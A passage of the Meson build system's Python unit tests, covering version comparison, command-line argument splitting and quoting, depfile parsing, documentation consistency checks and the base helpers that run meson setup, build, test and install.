("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
            # line continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
        errors = []  # type: T.List[T.Tuple[Path, Exception]]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.BUILTIN_OPTIONS.keys(),
*mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
        Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
        Ensure that the syntax highlighting JSON grammar written by TingPing was
        updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
        Ensure that all functions defined in the Interpreter are also defined
        in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
        data_files = []  # type: T.List[T.Tuple[str, str]]
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
from pprint import pprint
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
            # The Xcode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
        '''
        Run a command while printing the stdout and stderr to stdout,
        and also return a copy of it.
        '''
        # If this call hangs, CI will just abort. It is very hard to distinguish
        # between a CI issue and a test bug in that case. Set a timeout and fail
        # loudly instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
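        '''
        Change options of an already-configured build dir with `meson configure`.
        When the project will be built afterwards, first make sure the backend
        will notice that the configuration changed.
        '''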
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
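        '''
        Bump the mtime of a file so that the backend considers it changed on
        the next build.
        '''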
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
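        '''
        Return the parsed compile_commands.json of the build dir. Only
        available with the Ninja backend; .rsp commands are expanded into
        full command lines.
        '''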
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
        # If Ninja is using .rsp files, generate them, read their contents, and
        # substitute them as the command of each compile command in the parsed JSON.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
